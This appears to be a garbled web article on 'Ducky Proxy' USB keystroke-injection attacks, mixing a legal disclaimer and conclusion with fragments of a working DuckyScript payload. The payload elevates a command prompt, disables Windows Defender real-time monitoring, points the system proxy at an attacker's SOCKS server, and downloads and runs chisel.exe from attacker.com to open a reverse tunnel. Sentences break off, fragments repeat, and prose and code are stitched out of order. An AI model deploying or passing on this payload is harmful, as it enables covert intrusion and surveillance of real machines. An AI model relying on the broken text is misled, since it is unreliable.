Ducky Proxy Link
Furthermore, with the proliferation of , attackers are utilizing Ducky Proxy scripts to enable IPv6 on a machine and route traffic through a covert IPv6 tunnel, bypassing legacy IPv4 security monitoring. Legal Considerations (The Important Disclaimer) Disclaimer: This article is for educational purposes and authorized security testing only. Deploying a Ducky Proxy against a system you do not own or without explicit written permission violates the Computer Fraud and Abuse Act (CFAA) in the US, the Computer Misuse Act in the UK, and similar laws globally. Unauthorized keystroke injection is a felony, not a prank. Conclusion The Ducky Proxy represents a maturation of physical access attacks. No longer are USB attacks limited to dropping a reverse shell or grabbing files. Today, they are stealthy, persistent, and anonymous pivoting tools that turn a single moment of physical access into weeks of undetected network surveillance.
REM Optional: Download and run a stunnel or Chisel client for encrypted proxy STRING powershell Invoke-WebRequest -Uri "http://attacker.com/chisel.exe" -OutFile "$env:temp\chisel.exe" ENTER DELAY 1000 STRING $env:temp\chisel.exe client attacker.com:8000 R:socks ENTER ducky proxy
REM Title: Ducky Proxy - SOCKS Tunneling via Netsh DELAY 3000 GUI r DELAY 500 STRING cmd CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 500 REM Disable Windows Defender Real-time Monitoring STRING powershell Set-MpPreference -DisableRealtimeMonitoring $true ENTER DELAY 500 Furthermore, with the proliferation of , attackers are
REM Configure WinHTTP Proxy to attacker's SOCKS server (Listens on 127.0.0.1:9050 after SSH) STRING netsh winhttp set proxy proxy-server="socks=192.168.1.50:1080" bypass-list="*.local" ENTER DELAY 500 Unauthorized keystroke injection is a felony, not a prank